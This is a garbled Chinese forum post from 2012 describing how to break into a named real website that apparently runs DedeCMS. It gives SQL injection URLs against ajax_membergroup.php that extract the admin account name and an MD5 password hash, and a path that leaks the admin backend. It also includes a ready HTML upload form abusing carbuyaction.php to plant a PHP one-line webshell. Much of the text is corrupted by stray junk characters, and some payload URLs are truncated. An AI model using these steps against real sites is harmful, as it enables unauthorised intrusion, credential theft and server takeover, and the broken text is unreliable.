①注入漏洞。/ e5 q6 g5 t/ I. `
这站 http://www.political-security.com/ H4 R9 r3 m U6 t2 P2 D
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,% h9 Q, Q- @' I: _4 @! a1 `9 A- b' P
www.political-security.com/data/mysql_error_trace.inc 爆后台
' e, {2 K% R# \% P0 w: G然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。$ M- W4 J: W) A9 T5 [" {
然后写上语句
* N$ P! u/ H% h q查看管理员帐号3 I5 p1 g9 M# a4 @$ H, {
http://www.political-security.co ... &membergroup=@`
# V/ P' W. E: f6 ]1 d
|$ J/ R$ y! ]8 radmin
0 A# W4 S7 W/ o9 C# h* Y' |
, F1 P6 j. l, l查看管理员密码' i' _3 G: ^$ }. j
http://www.political-security.co ... &membergroup=@`
2 M: v$ k/ K$ X ^6 T) }8 E! C
x; ]0 c5 Q. c% P% Z ~' _% J8d29b1ef9f8c5a5af429" h: {, [% g1 {7 L/ B- f! r0 N
( N L* l& `9 Z查看管理员密码7 f, f' G E6 t1 o% g
2 e* F7 }) `6 b$ _, L/ c
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
8 s: f3 V# Y) `% W) u% o6 [, |4 A
* g. [1 X \# p) {9 w8d2$ \& Y* j6 S2 h7 n2 ^
9b1ef9f8c5a5af42& w0 Q, k5 W- B2 M
9' H# D f# }6 i; f; u; k2 `6 u" e
0 p _3 B5 e: s X
cmd5没解出来 只好测试第二个方法
9 }4 I9 G2 Y* c9 U: d( w8 i' p2 E l! [& O% S% B$ k
6 I% A4 x z6 y% ~" s' l3 R
②上传漏洞:
5 P B1 u/ o2 ~2 ?; {1 c$ |
; _; A9 h; U" C) {% x只要登陆会员中心,然后访问页面链接3 L' G! s1 u/ i, G+ f
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
; n+ B, N' W+ p. n) P! S7 w6 j( s: N0 }
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”2 I" t* {/ p6 T7 w' P! D
/ ?9 l3 e3 A% ~8 G4 w7 F+ _4 w% ?于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
4 Z) L0 f5 x& D9 ^1 l3 b. ^8 G
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
+ Q: a( _1 P/ h$ B2 z. }* q或者( g: x/ I. `0 l. l( D
即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对